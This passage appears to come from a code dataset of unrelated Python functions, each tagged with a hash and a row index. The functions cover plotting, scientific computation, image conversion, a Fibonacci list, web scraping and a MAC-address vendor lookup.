    # Add y ticks at left and right of 2D posteriors
    axes[1, 0].tick_params(axis='y', which='both', left=True, direction='inout', length=7.5)
    axes[1, 0].secondary_yaxis('right').tick_params(axis='y', which='both', right=True, direction='in',
                                                    labelright=False)
    axes[2, 0].tick_params(axis='y', which='both', left=True, right=True, direction='inout', length=7.5)
    axes[2, 1].tick_params(axis='y', which='both', left=True, right=True, labelleft=False, direction='in')

    # Limits
    axes[2, 0].set_xlim(x_lims)
    axes[2, 1].set_xlim(y_lims)
    axes[2, 2].set_xlim(z_lims)
    axes[1, 0].set_ylim(y_lims)
    axes[2, 0].set_ylim(z_lims)
    axes[2, 1].set_ylim(z_lims)

    # Fix overlapping z tick labels by removing every other tick
    axes[2, 2].set_xticks(axes[2, 2].get_xticks()[1::2])

    # Label axes
    axes[2, 0].set_xlabel(x_label)
    axes[2, 1].set_xlabel(y_label)
    axes[2, 2].set_xlabel(z_label)
    axes[1, 0].set_ylabel(y_label)
    axes[2, 0].set_ylabel(z_label)
    fig.align_ylabels()

    # Title
    axes[0, 0].annotate('Full Euclid-like mask', xy=(2.95, .95), xycoords='axes fraction', ha='right', va='top',
                        size=plt.rcParams['axes.titlesize'])

    # Legend
    leg_title = f'{min(contour_levels_sig)}\N{en dash}{max(contour_levels_sig)}$\\sigma$ confidence'
    axes[0, 0].legend(loc='upper right', bbox_to_anchor=(3, .8), handlelength=4, frameon=False, title=leg_title)

    if save_path is not None:
        plt.savefig(save_path)
        print('Saved ' + save_path)
    else:
        plt.show()
5e25de6f69a7d281e59ac1423b6be4b27080a689
3,652,531
def det(m1: ndarray) -> float:
    """
    Compute the determinant of a double precision 3x3 matrix.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/det_c.html

    :param m1: Matrix whose determinant is to be found.
    :return: The determinant of the matrix.
    """
    m1 = stypes.to_double_matrix(m1)
    return libspice.det_c(m1)
aa0a6629536df22ea016bb81a8e62769c7b3ab9e
3,652,532
def path_to_xy(path: PointList) -> XYList:
    """Convert PointList to XYList"""
    return [p.xy() for p in path]
ea8cc222ab2b8ce6634e9bb1ea7d456bfa451782
3,652,533
def is_gzip(name):
    """Return True if the name indicates that the file is compressed with gzip."""
    return name.endswith(".gz")
a6ea06f04808a07c4b26338f87273986eda86ef1
3,652,535
def possible_sums_of(numbers: list) -> list:
    """Compute all possible sums of numbers excluding self."""
    possible_sums = []
    for idx, nr_0 in enumerate(numbers[:-1]):
        for nr_1 in numbers[idx + 1:]:
            possible_sums.append(nr_0 + nr_1)
    return possible_sums
39ebe3e48c45a9c30f16b43e6c34778c5e813940
3,652,537
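A small worked example for possible_sums_of above (illustrative only, not part of the dataset row): each unordered pair is summed exactly once.

print(possible_sums_of([1, 2, 3]))   # [3, 4, 5]  (1+2, 1+3, 2+3)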
def normalize_norms(X, scale_factor=1, axis=0, by='sum'):
    """
    wrapper of `normalize_colsum` and `normalize_rowsum`

    Parameters
    ----------
    X: a (sparse) matrix
    scale_factor: numeric, None
        if None, use the median of sum level as the scaling factor.
    axis: int, {0, 1}
        if axis = 0, apply to each column;
        if axis = 1, apply to each row.
    by: str, {'sum', 'max'}
        normalization method
    """
    foo = normalize_col if axis == 0 else normalize_row
    return foo(X, scale_factor=scale_factor, by=by)
7c491245fc83b2b48c21cb91f79915af7261f5ba
3,652,538
def full_solution(combined, prob_dists):
    """
    combined: (w, n-1->n-w, 3, 3)
    prob_dists: (n, 3, total_reads)
    p[v,g,k] = prob of observing k of total_reads on ref if genotype is g on variant v
    """
    N = len(combined[0]) + 1
    best_idx, best_score = np.empty(N), -np.inf * np.ones(N)
    for j, counts in enumerate(combined, 1):
        scores = get_scores(counts, prob_dists[:-j])
        do_update = scores > best_score[j:]
        best_score[j:][do_update] = scores[do_update]
        best_idx[j:][do_update] = np.flatnonzero(do_update)
        rev_scores = get_scores(counts.swapaxes(-2, -1), prob_dists[j:])
        do_update = rev_scores > best_score[:-j]
        best_score[:-j][do_update] = rev_scores[do_update]
        best_idx[:-j][do_update] = np.flatnonzero(do_update) + j
    return best_idx
2732c57e44aa0c17bd652b01226053c095d9fdb3
3,652,539
def ycbcr2bgr(img):
    """Convert a YCbCr image to BGR image.

    The bgr version of ycbcr2rgb.
    It implements the ITU-R BT.601 conversion for standard-definition
    television. See more details in
    https://en.wikipedia.org/wiki/YCbCr#ITU-R_BT.601_conversion.

    It differs from a similar function in cv2.cvtColor: `YCrCb <-> BGR`.
    In OpenCV, it implements a JPEG conversion. See more details in
    https://en.wikipedia.org/wiki/YCbCr#JPEG_conversion.

    Args:
        img (ndarray): The input image. It accepts:
            1. np.uint8 type with range [0, 255];
            2. np.float32 type with range [0, 1].

    Returns:
        ndarray: The converted BGR image. The output image has the same type
            and range as input image.
    """
    img_type = img.dtype
    img = _convert_input_type_range(img) * 255
    out_img = np.matmul(
        img,
        [
            [0.00456621, 0.00456621, 0.00456621],
            [0.00791071, -0.00153632, 0],
            [0, -0.00318811, 0.00625893],
        ],
    ) * 255.0 + [-276.836, 135.576, -222.921]
    out_img = _convert_output_type_range(out_img, img_type)
    return out_img
e5e5c408e40645ae4844635fd0fbf065746f187d
3,652,540
import datetime


def tensorize_fg_coeffs(
    data,
    wgts,
    fg_model_comps,
    notebook_progressbar=False,
    verbose=False,
):
    """Initialize foreground coefficient tensors from uvdata and modeling component dictionaries.

    Parameters
    ----------
    data: list
        list of tf.Tensor objects, each with shape (ngrps, nbls, nfreqs)
        representing data
    wgts: list
        list of tf.Tensor objects, each with shape (ngrps, nbls, nfreqs)
        representing weights.
    fg_model_comps: list
        list of fg modeling tf.Tensor objects
        representing foreground modeling vectors.
        Each tensor is (nvecs, ngrps, nbls, nfreqs)
        see description in tensorize_fg_model_comps_dict docstring.
    notebook_progressbar: bool, optional
        use progress bar optimized for notebook output.
        default is False.
    verbose: bool, optional
        lots of text output
        default is False.

    Returns
    -------
    fg_coeffs_re: tf.Tensor object
        1d tensor containing real parts of coeffs for each modeling vector.
        ordering is over foreground modeling vector per redundant group
        and then redundant group in the order of groups appearing in red_grps
    fg_coeffs_im: tf.Tensor object
        1d tensor containing imag parts of coeffs for each modeling vector.
        ordering is over foreground modeling vector per redundant group
        and then redundant group in the order of groups appearing in red_grps
    """
    echo(
        f"{datetime.datetime.now()} Computing initial foreground coefficient guesses using linear-leastsq...\n",
        verbose=verbose,
    )
    fg_coeffs = []
    nchunks = len(data)
    binary_wgts = [
        tf.convert_to_tensor(~np.isclose(wgts[cnum].numpy(), 0.0), dtype=wgts[cnum].dtype) for cnum in range(nchunks)
    ]
    for cnum in PBARS[notebook_progressbar](range(nchunks)):
        # set up linear leastsq
        fg_coeff_chunk = []
        ngrps = data[cnum].shape[0]
        ndata = data[cnum].shape[1] * data[cnum].shape[2]
        nvecs = fg_model_comps[cnum].shape[0]
        # pad with zeros
        for gnum in range(ngrps):
            nonzero_rows = np.where(
                np.all(np.isclose(fg_model_comps[cnum][:, gnum].numpy().reshape(nvecs, ndata), 0.0), axis=1)
            )[0]
            if len(nonzero_rows) > 0:
                nvecs_nonzero = np.min(nonzero_rows)
            else:
                nvecs_nonzero = nvecs
            # solve linear leastsq
            fg_coeff_chunk.append(
                tf.reshape(
                    tf.linalg.lstsq(
                        tf.transpose(tf.reshape(fg_model_comps[cnum][:, gnum], (nvecs, ndata)))[:, :nvecs_nonzero],
                        tf.reshape(data[cnum][gnum] * binary_wgts[cnum][gnum], (ndata, 1)),
                    ),
                    (nvecs_nonzero,),
                )
            )
            # pad zeros at the end back up to nvecs.
            fg_coeff_chunk[-1] = tf.pad(fg_coeff_chunk[-1], [(0, nvecs - nvecs_nonzero)])
        # add two additional dummy indices to satisfy broadcasting rules.
        fg_coeff_chunk = tf.reshape(tf.transpose(tf.stack(fg_coeff_chunk)), (nvecs, ngrps, 1, 1))
        fg_coeffs.append(fg_coeff_chunk)

    echo(
        f"{datetime.datetime.now()} Finished initial foreground coefficient guesses...\n",
        verbose=verbose,
    )
    return fg_coeffs
dbff52b154326df6a324ef454887c65bfe528044
3,652,541
def receive_incoming_bets():
    """Sends fixtures to the front-end"""
    return fixtures.fixtures_information
2ab61c0bc15bb9c8c4359bb8ca7e8b1287b1d182
3,652,542
def fibonacci(n):
    """
    object: fibonacci(n) returns the first n Fibonacci numbers in a list
    input: n - the number used to calculate the fibonacci list
    return: retList - the fibonacci list
    """
    if type(n) != int:
        print(n)
        print(": input not an integer")
        return False
    if n <= 0:
        print(str(n) + " not a positive integer")
        return False
    f1 = 1
    f2 = 1
    retList = []
    for i in range(0, n):
        retList.append(f1)
        fn = f1 + f2
        f1 = f2
        f2 = fn
    return retList
ac37d952eecae57b33fb3768f1c8097d76769534
3,652,543
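Illustrative calls to fibonacci above (not part of the dataset row; assumes the function is in scope):

print(fibonacci(7))    # [1, 1, 2, 3, 5, 8, 13]
print(fibonacci(-2))   # prints an error message and returns False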
def psnr_batch(_mse_batch_val):
    """
    :param _mse_batch_val: ndarray
    :return: ndarray

    Usage:
        1) The batch is handled per channel. Thus, it is recommended to call the
           mse_batch function before the psnr_batch function.
        2) cumsum_psnr_rgb += (metric_.psnr_batch(_mse_batch_val=(metric_.mse_batch(
               _ndarr_input=imgcv_.batch2channel(_ndarr=ndarr_input),
               _ndarr_ref=imgcv_.batch2channel(_ndarr=ndarr_ref),
               _num_colr_channel=3)))).sum()
    """
    return (10 * np.log10((255.0 ** 2) / _mse_batch_val))
c33eaa3e04fbd7d9749ad8989a15ea198ff4d806
3,652,544
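A worked example for psnr_batch above (illustrative only; assumes numpy and the function are in scope): an MSE equal to 255**2 maps to 0 dB, while an MSE of 1 maps to roughly 48.13 dB.

import numpy as np

print(psnr_batch(np.array([255.0 ** 2, 1.0])))  # approx. [ 0.    48.13]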
def get_u0(u0_type, num_features):
    """return a polyhedral definition for U^0, B_mat and b_vec"""
    assert u0_type in ["box", "positive_normed"]
    if u0_type == "box":
        B_mat, b_vec = U0_box(num_features)
    if u0_type == "positive_normed":
        B_mat, b_vec = U0_positive_normed(num_features)
    return B_mat, b_vec
bb6856284067ac3d5b39ca50d30c5745a7ee5e07
3,652,545
def funcparser_callable_search_list(*args, caller=None, access="control", **kwargs):
    """
    Usage: $objlist(#123)

    Legacy alias for search with a return_list=True kwarg preset.
    """
    return funcparser_callable_search(*args, caller=caller, access=access, return_list=True, **kwargs)
511bff6803ba9b088fa94d32e9cb3f85c4823b94
3,652,546
def upcoming_movie_name(soup):
    """
    Extracts the list of movies from BeautifulSoup object.

    :param soup: BeautifulSoup object containing the html content.
    :return: list of movie names
    """
    movie_names = []
    movie_name_tag = soup.find_all('h4')
    for _movie in movie_name_tag:
        _movie_result = _movie.find_all('a')
        try:
            _movie_name = _movie_result[0]['title']
            movie_names.append(_movie_name)
        except KeyError as e:
            continue

    return movie_names
6bac06375109ec103492a079746e2c0364bfac17
3,652,547
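A minimal usage sketch for upcoming_movie_name above (illustrative only, not part of the dataset row; assumes BeautifulSoup is installed and the function is in scope):

from bs4 import BeautifulSoup

html = '<h4><a title="Example Movie">Example Movie</a></h4>'
soup = BeautifulSoup(html, "html.parser")
print(upcoming_movie_name(soup))  # ['Example Movie']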
def options(*args, **kw):
    """Mark the decorated function as a handler for OPTIONS requests."""
    return _make_handler_decorator('OPTIONS', *args, **kw)
21e6f830e054a84cd16e5cdfbb63c2202ff70d7b
3,652,548
import codecs
import json


def lookup_vendor_name(mac_address):
    """
    Translates the returned mac-address to a vendor
    """
    url = "http://macvendors.co/api/%s" % mac_address
    request = urllib2.Request(url, headers={'User-Agent': "API Browser"})
    try:
        response = urllib2.urlopen(request)
        reader = codecs.getreader("utf-8")
        obj = json.load(reader(response))
        response.close()
        return obj['result']['company']
    except urllib2.URLError:
        return "Unable to lookup MAC address"
    except KeyError:
        return "MAC lookup API changed"
ad854390256c87c537b1d8e4e8906b3b3d0b10bd
3,652,549